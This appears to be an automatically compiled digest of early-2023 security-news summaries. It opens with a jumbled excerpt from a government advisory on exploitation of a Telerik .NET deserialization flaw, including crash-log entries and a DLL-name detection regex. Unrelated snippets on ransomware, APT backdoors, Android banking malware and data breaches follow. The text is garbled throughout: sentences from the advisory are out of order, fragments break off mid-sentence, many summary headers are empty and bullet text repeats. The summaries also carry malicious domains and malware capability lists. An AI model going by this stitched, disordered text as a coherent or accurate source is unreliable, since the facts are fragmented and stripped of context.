recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention.Application Crash {"EventData":{"Data":"0, APPCRASH, Not available, 0, w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, C:\\Windows\\Temp\\WERE3F6.tmp.appcompat.txt C:\\Windows\\Temp\\WERE639.tmp.All of the analyzed samples have network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [T1016].|1664175639.65719.dll |c:\windows\system32\inetsrv\w3wp.exe |C:\Windows\Temp\1664175639.65719.dll Application Error {"EventData":{"Data":"w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, c:\\windows\\system32\\inetsrv\\w3wp.exe, C:\\Windows\\Temp\\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7","Binary":""}} 1001 w3wp.exe CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.These descriptions are sourced directly from Microsoft.[6] Table 5: Four Fields Searched in IIS Logs General Name Field Name Description Method cs-method Requested action; for example, a GET method URI Stem cs-uri-stem Universal Resource Identifier (URI), or target, of the action URI Query cs-uri-query The query, if any, that the client was trying to perform; A URI query is necessary only for dynamic pages.TA1’s malware gathers network parameters, including host name, domain name, DNS servers, NetBIOS ID, adapter information, IP address, subnet, gateway IP, and DHCP server.Web.UI.WebResource.axd, [*redacted*], False, [*redacted*], 15, [*redacted*], False, at Telerik.For example, file 1596835329.5015914.png , which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020.WERInternalMetadata.xml C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\\memory.hdmp C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\\triagedump.dmp, C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656, 0, eed89eeb-3d68-11ed-817c-005056990ed7, 4","Binary":""}} The EventID field maps to Windows EventIDs for an easy filter. VALIDATE SECURITY CONTROLS In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.Proof-of-Concept Exploit for CVE-2019-18935 [6] Microsoft: Configure Logging in IIS [7] GitHub: CVE-2019-18935 ACKNOWLEDGEMENTS Google’s Threat Analysis Group (TAG) contributed to this CSA. Other Best Practice Mitigation Recommendations Implement phishing-resistant multifactor authentication (MFA) for as many services possible—particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups. In addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: CVE-2017-11357, CVE-2017-11317, and CVE-2017-9248.Example Regex: \d{10}\.\d{1,8}\.dll These numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed.As presented by Bishop Fox and proven during authoring organizations’ investigation of IIS server logs, an exception does not mean that the exploit failed, but more likely that it executed successfully.[3] Figure 1: Threat Actor Assembly Installer If a Werfault crash report was written, Windows event application logs may contain evidence of this— even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors.Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Overview CISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency’s Microsoft IIS server. Log Type: Windows Event Application Logs Location: -%SystemDrive%\Windows\System32\winevt\logs\Application.evtx Kroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server.[CPG 3.1, 3.2] Evaluate user permissions and maintain separate user accounts for all actions and activities not associated with the administrator role, e.g., for business email, web browsing, etc. "
Autosummary:
"Microsoft to boost protection against malicious OneNote documents Microsoft has announced that, starting in April 2023, they will be adding enhanced protection when users open or download a file embedded in a OneNote document – a known high-risk phishing file type. Massive GitHub analysis reveals 10 million secrets hidden in 1 billion commits GitGuardian scanned 1.027 billion new GitHub commits in 2022 (+20% compared to 2021) and found 10,000,000 secrets occurrences (+67% compared to 2022). … More
The post Week in review: Public MS Word RCE PoC, API exploitation, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: March 10, 2023 Here’s a look at the most interesting products from the past week, featuring releases from 1Password, GrammaTech, Kensington, Palo Alto Networks, and Persona. How STEM education can solve talent shortages, improve cybersecurity In this Help Net Security video, Avani Desai, CEO at Schellman, talks about how teaching STEM subjects like cybersecurity is essential for addressing the staffing crisis and ensuring that organizations have the talent to protect themselves from cyber threats in the years to come. "Acronis downplays the severity of the recent security breach explaining that only a single customer’s account was compromised. The CISO of Acronis downplayed a recent intrusion, revealing that only one customer was impacted. This week a threat actor, who goes online with the moniker “kernelware”, claimed the theft of data from technology firm Acronis and […]
The post Acronis states that only one customer’s account has been compromised. Much ado about nothing appeared first on Security Affairs.
"Autosummary:
The Acronis leak contains multiple certificate files, command logs, system configurations, system information logs, filesystem archives, python scripts for the company’s maria.db database, backup configuration stuff, screenshots of backup operations, “Based on our investigation so far, the credentials used by a single specific customer to upload diagnostic data to Acronis support have been compromised. "Autosummary:
The ransom note will also include extension contact information, including a Tor data leak site, a Tor negotiation site, a Telegram channel, a Tox ID, and the key.medusa.serviceteam@protonmail.com email address. Medusa Ransomware ransom note Source: BleepingComputer As an extra step to prevent the restoration of files from backups, the Medusa ransomware will run the following command to delete locally stored files associated with backup programs, like Windows Backup. Medusa ransomware console window Source: BleepingComputer In a regular run, without command line arguments, the Medusa ransomware will terminate over 280 Windows services and processes for programs that may prevent files from being encrypted. "Atera announced a new strategic partnership and integration with ESET, enabling Atera’s community of IT professionals to deploy anti-malware solutions to protect their customers. “As cyberattacks increase in sophistication and frequency, it is important that we partner with cybersecurity leaders like ESET to offer proactive protection against the toughest malware, and arm customers against zero-day threats,” said Gil Pekelman, CEO of Atera. “ESET’s multi-layered approach to threat detection as well as response, including threat intelligence … More
The post Atera and ESET join forces to arm customers against zero-day threats appeared first on Help Net Security.
"Autosummary:
IT professionals using Atera have the option to choose from four popular solution tier packages: ESET PROTECT Entry, ESET PROTECT Advanced, ESET PROTECT Compete or ESET PROTECT Enterprise – advanced and customizable security solutions that include endpoint security, detection and response; file and mail server security; mobile security and more. "US CISA added an actively exploited vulnerability in VMware’s Cloud Foundation to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in VMware’s Cloud Foundation, tracked as CVE-2021-39144 (CVSS score: 9.8), to its Known Exploited Vulnerabilities Catalog. The remote code execution vulnerability resides in the XStream open-source library. Unauthenticated attackers […]
The post CISA adds VMware’s Cloud Foundation bug to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, VMWare) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Anatel"s certification area informs that the equipment called FLIPPER ZERO has been used in the country by malicious users in facilitating a crime or criminal misdemeanor and, as provided for in item II of Art. 60 of the Regulation for Conformity Assessment and Homologation of Telecommunications Products (annex to Resolution No. 715, of October 23, 2019), Anatel has rejected all homologation requests for the product in question, in order to collaborate in the protection of Brazilian citizens against criminal actions," reads a letter received by Flipper Zero customers in Brazil. "Autosummary:
"Autosummary:
Organizations that had their Accellion servers hacked include, among others, energy giant Shell, cybersecurity firm Qualys, supermarket giant Kroger, and multiple universities worldwide such as Stanford Medicine, University of Colorado, University of Miami, University of California, and the University of Maryland Baltimore (UMB). "Researchers observed threat actors deploying PlugX malware by exploiting flaws in Chinese remote control programs Sunlogin and Awesun. Researchers at ASEC (AhnLab Security Emergency response Center) observed threat actors deploying the PlugX malware by exploiting vulnerabilities in the Chinese remote control software Sunlogin and Awesun. Sunlogin RCE vulnerability (CNVD-2022-10270 / CNVD-2022-03672) is known to be […]
The post PlugX malware delivered by exploiting flaws in Chinese programs appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Hybrid work has exposed another area of vulnerability, with 70% of government workers reporting they work virtually at least some of the time, according to Ivanti. The proliferation of devices, users, and locations adds complexity and new vulnerabilities for government security teams to tackle – while also combatting increasingly sophisticated threat actors. With generative AI making phishing emails increasingly more realistic, the human-sized gaps in cybersecurity are placing government agencies and organizations at increasing risk … More
The post Young government workers show poor password management habits appeared first on Help Net Security.
"Autosummary:
Poor cybersecurity hygiene among government workers According to the report, a “not my job” attitude is contributing to the security risk for the public sector: 34% of government employees do not believe their actions impact their organization’s ability to stay safe 17% don’t feel safe reporting security mistakes they’ve made to the cybersecurity team 36% did not report a phishing email they received at work Alarmingly, 21% don’t care if their organization gets hacked “We are in a state of urgency when it comes to securing critical infrastructure, along with public sector employees and the extremely sensitive data they have access to,” said Srinivas Mukkamala, CPO at Ivanti. "Economic uncertainty is squeezing organizations globally. Gartner predicts nearly half of cybersecurity leaders will change jobs by 2025. These findings are alarming but undoubtedly unsurprising in today’s IT landscape. In this Help Net Security video, Denis Dorval, VP of International at JumpCloud, discusses how the responsibility of cybersecurity can no longer be placed on the shoulders of IT admins alone. Experts have long been advising that cybersecurity must be an organization-wide priority built into the … More
The post The cybersecurity landscape in the era of economic instability appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Countries of targeted banks (ThreatFabric) Some examples of targeted institutions include Chase, Citibank, American Express, ING, HSBC, Deutsche Bank, Wells Fargo, Amex, Citi, BNP, UniCredit, National Bank of Canada, BBVA, Santander, and Caixa. "“In 2022, investment scam losses were the most (common or dollar amount) scheme reported to the Internet Crime Complaint Center (IC3),” the FBI shared in its 2022 Internet Crime Report. This category includes crypto-investment scams such as liquidity mining, celebrity impersonation, “pig butchering“, and many more. Business email compromise (BEC) scams are overall the second most financially destructive, followed by tech support scams and personal data breaches. 2022 Internet Crime Report: Additional findings The number … More
The post Internet crime in 2022: Over $3 billion lost to investment scammers appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Two of the Xenomorph-laced apps are listed below - Play Protect (com.great.calm) Play Protect (meritoriousness.mollah.presser) "Xenomorph v3 is deployed by a Zombinder app "bound" to a legitimate currency converter, which downloads as an "update" an application posing as Google Protect," ThreatFabric explained. "Autosummary:
Establishing a foothold within compromised environments is achieved by means of a C++-based backdoor known as PLANKWALK that then paves the way for the distribution of additional tooling such as - TOUCHSHIFT - A malware dropper that loads follow-on malware ranging from keyloggers and screenshot utilities to full-featured backdoors - A malware dropper that loads follow-on malware ranging from keyloggers and screenshot utilities to full-featured backdoors TOUCHSHOT - A software that"s configured to take a screenshot every three seconds - A software that"s configured to take a screenshot every three seconds TOUCHKEY - A keylogger that captures keystrokes and clipboard data - A keylogger that captures keystrokes and clipboard data HOOKSHOT - A tunneling tool that connects over TCP to communicate with the command-and-control (C2) server - A tunneling tool that connects over TCP to communicate with the command-and-control (C2) server TOUCHMOVE - A loader that"s designed to decrypt and execute a payload on the machine - A loader that"s designed to decrypt and execute a payload on the machine SIDESHOW - A C/C++ backdoor that runs arbitrary commands and communicates via HTTP POST requests with its C2 server UNC2970 is also said to have leveraged Microsoft Intune, an endpoint management solution, to drop a bespoke PowerShell script containing a Base64-encoded payload referred to as CLOUDBURST, a C-based backdoor that communicates via HTTP. "AT&T is warning some of its customers that some of their information was exposed after the hack of a third-party vendor’s system. AT&T is notifying millions of customers that some of their information was exposed after a third-party vendor was hacked. CPNI is information related to the telecommunications services purchased by the customers, including the […]
The post AT&T is notifying millions of customers of data breach after a third-party vendor hack appeared first on Security Affairs.
"Autosummary:
"Autosummary:
In general, the company lists the following information as potentially exposed: Full name Phone number Email address Date of birth IP address Cerebral client ID number Demographic information Self-assessment responses and associated health information Subscription plan type Appointment dates Treatment details and other clinical information Health insurance/ pharmacy benefit information This information may have been leaked to third parties from October 12, 2019, through January 3, 2023, when the company realized that data was being exposed via tracking pixels. "Autosummary:
"Autosummary:
Take, for instance, if you decide that you don’t fancy paying the $300 or so that Apple charges for the Mac edition of Final Cut Pro. Maybe you decide that because you can’t afford to pay that for video-editing software that you’ll venture onto the internet instead, and see if you can download a pirated version of Final Cut Pro from a torrent instead. "Autosummary:
"The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades," cybersecurity company Mandiant said in a technical report published this week. "A new version of the Xenomorph Android malware includes a new automated transfer system framework and targets 400 banks. The author of the Xenomorph Android malware, the Hadoken Security Group, continues to improve their malicious code. In February 2022, researchers from ThreatFabric first spotted the Xenomorph malware, which was distributed via the official Google Play Store […]
The post Latest version of Xenomorph Android malware targets 400 banks appeared first on Security Affairs.
"Autosummary:
The new variant supports a new automated transfer system (ATS) framework and can target over 400 banks and financial institutions mainly from Spain, Turkey, Poland, the United States, Australia, Canada, Italy, Portugal, France, Germany, UAE, and India “This new version of the malware adds many new capabilities to an already feature rich Android Banker, most notably the introduction of a very extensive runtime engine powered by Accessibility services, which is used by actors to implement a complete ATS framework. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Xenomorph Android malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
TouchShift then loads another screenshot utility called “TouchShot,” a keylogger named “TouchKey,” a tunneller named “HookShot,” a new loader named “TouchMove,” and a new backdoor named “SideShow.” However, Mandiant observed enough differences in the employed tools, infrastructure, and TTPs (tactics, techniques, and procedures) to attribute this campaign to a separate group they track as “UNC2970.” "Autosummary:
"If successfully exploited, the impact of these vulnerabilities could be catastrophic, allowing attackers to execute arbitrary code, steal data, and/or take control of the network infrastructure. "Autosummary:
The organizations impacted by the incident include many entities, such as charities, foundations, non-profits, and universities worldwide, from the U.S., Canada, the U.K., and the Netherlands. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @serghei, @Seifreed, @malwrhunterteam, @demonslay335, @LawrenceAbrams, @billtoulas, @fwosar, @PolarToffee, @LabsSentinel, @BrettCallow, @security_score, @AhnLab_SecuInfo, @AJVicens, @AlvieriD, @pcrisk, @chum1ng0, and @TrendMicro. Finally, we learned more about various ransomware attacks this week, including ones on the City of Oakland, Hospital Clínic de Barcelona, Technion, Fonasa, and the Minneapolis Public Schools district. "Autosummary:
Unfortunately, it only takes one user to accidentally run a malicious file to infect themselves with information-stealing malware or, even worse, trigger a ransomware attack. "Categories: News Researchers at Mandiant have identified a campaign that persisted on SonicWall SMA 100 Series appliances tenaciously. |
The post Malware targeting SonicWall devices could survive firmware updates appeared first on Malwarebytes Labs.
"Autosummary:
In a blog post from March 1, 2023 SonicWall describes the patch and states that: SonicWall has taken the approach of incorporating security enhancements in their products, such as the SMA 100 series, which helps identify potentially compromised devices by performing several checks at the operating system level and baselining normal operating system state. "Autosummary:
"Autosummary:
"Here"s a roundup of some of the most common tricks that fraudsters use to dupe their victims on WhatsApp – and what you can do to protect yourself against them.
The post Common WhatsApp scams and how to avoid them appeared first on WeLiveSecurity
"Autosummary:
Of all kinds of scams, romance scams can be particularly nefarious and damaging: they manipulate the victim’s feelings of trust, love, emotional connection, along with a profound desire for a romantic relationship and to help “no matter what.”In scenarios like this one, the scammer will take advantage of your hopes, leading you to trust them until they ask for a favor, accompanied by a meticulously cooked-up sob story about them badly needing money in order to help their relative or get out of trouble.Smishing and verification codes Your phone “beeps”: you’ve just received a text message with an unsolicited authentication code that claims to be from Microsoft, Google, or even WhatsApp.Charity scams – “$10 is enough to help” Supporting a charity or cause, when we have the means, is a noble thing to do. The fraudsters often use emotional tactics, such as claiming to help victims of natural disasters or illness, to trick people into giving money.Surveys, packages and lotteries – they’re all fake Instead of a money transfer, you might also be deceived into handing over your personal information. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Anna Brading – @annabrading Episode links: Sponsored by: Bitwarden – Password security you can trust. "Autosummary:
Emsisoft CTO Fabian Wosar previously told BleepingComputer that other ransomware gangs (besides the ones we have already reported on), including Babuk, GoGoogle, Snatch, PureLocker, Mespinoza, RansomExx/Defray, and DarkSide, have developed and deployed their own Linux encryptors in attacks. "Autosummary:
"PlugX operators use a high variety of trusted binaries which are vulnerable to DLL Side-Loading, including numerous anti-virus executables," Security Joes noted in a September 2022 report. "Autosummary:
"Autosummary:
"The group undertakes intelligence gathering, often human focused intelligence, like extracting the contents of mailboxes, contact lists, travel plans, relationships, physical location, etc. "The recently discovered Windows ransomware IceFire now also targets Linux enterprise networks in multiple sectors. SentinelLabs researchers discovered new Linux versions of the recently discovered IceFire ransomware that was employed in attacks against several media and entertainment organizations worldwide. The ransomware initially targeted only Windows-based systems, with a focus on technology companies. IceFire was first detected in […]
The post Recently discovered IceFire Ransomware now also targets Linux systems appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, IceFire ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Already seen victim companies from multiple countries, including multiple victims from 1-1 countries in the past < 40 hours, so they started "hard" it seems…@demonslay335 pic.twitter.com/QfguAicNYO — MalwareHunterTeam (@malwrhunterteam) March 14, 2022 The experts observed threat actors exploiting a deserialization vulnerability in IBM Aspera Faspex file-sharing software (CVE-2022-47986, CVSS score: 9.8) to deploy the ransomware. "Autosummary:
For example, there"s a script named "iptabled" that is essentially the same module as firewalld but will be only called by the startup script ("rc.local") if the primary malware process exits, crashes, or can"t be launched. "Autosummary:
"Autosummary:
"Alleged China-linked threat actors infected unpatched SonicWall Secure Mobile Access (SMA) appliances with a custom backdoor. Mandiant researchers reported that alleged China-linked threat actors, tracked as UNC4540, deployed custom malware on a SonicWall SMA appliance. The malware allows attackers to steal user credentials, achieve persistence through firmware upgrades, and provides shell access. The analysis of a […]
The post SonicWall SMA appliance infected by a custom malware allegedly developed by Chinese hackers appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, SonicWall) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"92% of organizations have fallen victim to successful phishing attacks in the last 12 months, while 91% of organizations have admitted to experiencing email data loss, according to Egress. Not surprisingly, 99% of cybersecurity leaders confess to being stressed about email security. Specifically, 98% are frustrated with their Secure Email Gateway (SEG), with 53% conceding that too many phishing attacks bypass it. “The growing sophistication of phishing emails is a major threat to organizations and … More
The post AI is taking phishing attacks to a whole new level of sophistication appeared first on Help Net Security.
"Autosummary:
“Unfortunately, phishing attacks will only become more advanced in the future, as cybercriminals use AI-powered technologies, such as chatbots, to automate and improve their attacks, such as adding video and voice capabilities to text-based phishing,” Chapman concluded. "With 10% of startups failing in the first year, making wise and future-proof decisions for your new cybersecurity venture is essential. Building the perfect cybersecurity startup As society adapts to an increasingly digital world, opportunities for cybercrime and attacks are also mounting. Consequently, more and more cybersecurity businesses are popping up, and the market is becoming more saturated with each quarter that passes. While there’s no blueprint for building the perfect cybersecurity startup, there are … More
The post Three crucial moments when founding a cybersecurity startup appeared first on Help Net Security.
"Autosummary:
It’s never too early to start networking It’s no secret that networking offers invaluable opportunities, from practicing communication and sales skills to meeting potential customers, suppliers, partners, and investors. Certified Information Security Auditor (CISA) CompTIA Security+ These three certifications are often regarded as the industry standard, so depending on the type of cybersecurity startup you have, you’ll likely want to broaden your expertise by earning those. "In this Help Net Security video, Avani Desai, CEO at Schellman, talks about how teaching STEM subjects like cybersecurity is essential for addressing the staffing crisis and ensuring that organizations have the talent to protect themselves from cyber threats in the years to come. In addition, teaching STEM subjects like cybersecurity can help promote diversity and inclusion in the tech industry. By providing opportunities for underrepresented groups to learn about cybersecurity and pursue careers in … More
The post How STEM education can solve talent shortages, improve cybersecurity appeared first on Help Net Security.
"Autosummary:
"After combing through 350,000 reports to find 650 API-specific vulnerabilities from 337 different vendors and tracking 115 published exploits impacting these vulnerabilities, the results clearly illustrate that the API threat landscape is becoming more dangerous, according to Wallarm. API attack analysis for 2022 Researchers came to this conclusion based on the 2022 data, specifically these three trends: Attack growth In 2022 there was a huge increase in attacks against Wallarm’s customers’ APIs, which ballooned over … More
The post Attackers exploit APIs faster than ever before appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
It further noted that the campaign is likely "staged by advanced Chinese-backed threat actors, whose other tools, capabilities and position within the broader network of espionage activities are yet to be explored." "China-linked APT group Sharp Panda targets high-profile government entities in Southeast Asia with the Soul modular framework. CheckPoint researchers observed in late 2022, a campaign attributed to the China-linked APT group Sharp Panda that is targeting a high-profile government entity in the Southeast Asia. The state-sponsored hackers used a new version of the SoulSearcher loader, which eventually loads a new […]
The post China-linked APT Sharp Panda targets government entities in Southeast Asia appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Sharp Panda) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Security researchers warn of hacking attempts in the wild exploiting critical vulnerabilities in VMware NSX Manager. Cyber security firm Wallarm is warning of ongoing attacks exploiting the critical flaws, tracked as CVE-2021-39144 (CVSS score of 9.8) and CVE-2022-31678 (CVSS score of 9.1), in VMware NSX Manager. VMware NSX is a network virtualization solution that is […]
The post VMware NSX Manager bugs actively exploited in the wild since December appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, VMware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
A direct comparison of pen testing with automated scanning tools only concerns dynamic application security testing tools, or DAST, since static security testing tools require source code access, which is typically unavailable to penetration testers. Since traditional penetration testing can be time-consuming and allows glaring security vulnerabilities to remain exposed for long periods of time, thanks to strictly point-in-time results, businesses need to rely on PTaaS for real-time insight into security vulnerabilities. "US CISA added actively exploited flaws in Teclib GLPI, Apache Spark, and Zoho ManageEngine ADSelfService Plus to its Known Exploited Vulnerabilities Catalog. US CISA added the following actively exploited flaws to its Known Exploited Vulnerabilities Catalog: The CVE-2022-35914 flaw is a PHP code injection vulnerability that resides in the /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI […]
The post CISA adds three new bugs to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Known Exploited Vulnerabilities Catalog) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
MPS not paying The Minneapolis Public School published an announcement on March 1, 2023, disclosing its suffering from an "encryption event" that caused system outages since February 21, 2023. "Autosummary:
"Autosummary:
"Autosummary:
Subscriber ID,Member ID,Policy ID,Status,First Name,Last Name,SSN,DOB,Gender,Relationship,Benefit Type,Plan Name,HIOS ID,Plan Metal Level,Carrier Name,Premium Amount,Premium Total,Policy APTC,Policy Employer Contribution,Coverage Start,Coverage End,Employer Name,Employer DBA,Employer FEIN,Employer HBX ID,Home Address,Mailing Address,Work Email,Home Email,Phone Number,Broker,Race,Ethnicity,Citizen Status,Plan Year Start,Plan Year End,Plan Year Status "Categories: Ransomware Categories: Threat Intelligence February 2023 saw a record number of victims for LockBit, a record high ransom demand, and a devastating assault on the City of Oakland. |
The post Ransomware review: March 2023 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by gang, February 2023 Known ransomware attacks by country, February 2023 Known ransomware attacks by industry sector, February 2023 Companies attacked along LockBit’s warpath last month include financial software firm ION Group and Pierce Transit, a public transit operator in Washington state.The report states: The authoring agencies assess that an unspecified amount of revenue from these cryptocurrency operations supports DPRK national-level priorities and objectives, including cyber operations targeting the United States and South Korea governments—specific targets include Department of Defense Information Networks and Defense Industrial Base member networks, In the last few years, two new ransomware strains from DPRK have surfaced: Maui and H0lyGh0st. The V is Vendetta leak site DPRK"s ransomware antics In early February, CISA released an alert highlighting the continuous state-sponsored ransomware activities by the Democratic People"s Republic of Korea (DPRK) against organizations in the US healthcare sector and other vital infrastructure sectors.The apparently Russian-based group tallied just two victims on its leak site in February, but—true to their modus operandi—both of them were educational institutions: Guildford County School, a specialist music academy in London, and Mount Saint Mary College, a liberal arts college in New York. "Veeam addressed a high-severity vulnerability in the Backup Service that impacts Backup & Replication software. Veeam addressed a high-severity vulnerability in the Backup Service, tracked as CVE-2023-27532 (CVSS v3 score: 7.5), that impacts all versions of Backup & Replication software versions. “Vulnerability CVE-2023-27532 in Veeam Backup & Replication component allows to obtain encrypted credentials stored in the […]
The post Veeam warns to install patches to fix a bug in its Backup & Replication product appeared first on Security Affairs.
"Autosummary:
"Palo Alto Networks released new Identity Threat Detection and Response (ITDR) module for Cortex XSIAM, enabling customers to ingest user identity and behavior data and deploy AI technology to detect identity-driven attacks within seconds. The module further strengthens XSIAM’s ability to consolidate multiple security operations capabilities into a unified, AI-driven security operations center (SOC) platform. Identity-driven attacks, which target user credentials to access confidential data and systems, are one of the most common methods cyber … More
The post Palo Alto Networks enhances cybersecurity capabilities with AI-powered ITDR module appeared first on Help Net Security.
"Autosummary:
Cortex XSIAM already natively integrates security information and event management (SIEM), endpoint detection and response (EDR), network detection and response (NDR), security, orchestration and response (SOAR), Threat Intelligence Management (TIM) and Attack Surface management (ASM) capabilities, replacing the need for multiple point solutions. "When it comes to data breaches, organizations are generally informed about the risks and procedures for mitigating them. They can (typically) respond with minimal collateral damage. But the impact a data breach can have on individuals can be devasting; getting back to something that vaguely resembles normality is very challenging. In my work helping these people, I’ve been asked multiple times whether it would help to get a new phone number or even move to … More
The post Preventing corporate data breaches starts with remembering that leaks have real victims appeared first on Help Net Security.
"Autosummary:
Thankfully, in many countries, volunteers such those involved with KyberVPK in Finland, have rolled up their sleeves and formed “volunteer cyber fire brigades” to help organizations such as hospitals and schools with cyber-related issues in case of attack.For individuals, there is often a general lack of security awareness and understanding of things like multifactor authentication, security products, and what a big leak can mean for them at a personal level. "Serious security vulnerabilities have been identified in multiple DJI drones. These weaknesses had the potential to allow users to modify crucial drone identification details such as its serial number and even bypass security mechanisms that enable authorities to track both the drone and its pilot. In special attack scenarios, the drones could even be brought down remotely in flight. Photo by: RUB, Marquard The team headed by Nico Schiller of the Horst Görtz Institute for … More
The post Vulnerability in DJI drones may reveal pilot’s location appeared first on Help Net Security.
"Autosummary:
Photo by: RUB, Marquard The team headed by Nico Schiller of the Horst Görtz Institute for IT Security at Ruhr University Bochum, Germany, and Professor Thorsten Holz, from the CISPA Helmholtz Center for Information Security, have presented their findings at the Network and Distributed System Security Symposium. DJI drones put to the test The team tested three DJI drones of different categories: the small DJI Mini 2, the medium-sized Air 2, and the large Mavic 2. "Autosummary:
"Autosummary:
"ESET researchers analyze a cyberespionage campaign that distributes CapraRAT backdoors through trojanized and supposedly secure Android messaging apps – but also exfiltrates sensitive information
The post Love scam or espionage? Transparent Tribe lures Indian and Pakistani officials appeared first on WeLiveSecurity
"Autosummary:
Based on these commands, CapraRAT is capable of exfiltrating: call logs, the contacts list, SMS messages, recorded phone calls, recorded surrounding audio, CapraRAT-taken screenshots, CapraRAT-taken photos, a list of files on the device, any particular file from the device, device location, a list of running apps, and text of all notifications from other apps. It can also receive commands to download a file, launch any installed app, kill any running app, make a call, send SMS messages, intercept received SMS messages, and download an update and request the victim to install it.Once this account is created, the app requests further permissions that allow the backdoor’s full functionality to work, such as accessing contacts, call logs, SMS messages, external storage, and recording audio.This information allowed us to geolocate over 150 victims in India, Pakistan, Russia, Oman, and Egypt, as seen in Figure 4. Technical analysis Initial access As described above, the malicious MeetUp app has been available at meetup-chat[.]com, and we believe with high confidence that the malicious MeetsApp was available at meetsapp[.]org. "Security researcher released a proof-of-concept exploit code for a critical flaw, tracked as CVE-2023-21716, in Microsoft Word. Security researcher Joshua Drake released a proof-of-concept for a critical vulnerability, tracked as CVE-2023-21716 (CVSS score 9.8 out of 10), in Microsoft Word. The vulnerability can be exploited by a remote attacker to execute arbitrary code on a […]
The post Expert released PoC exploit code for critical Microsoft Word RCE flaw appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Microsoft Word) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
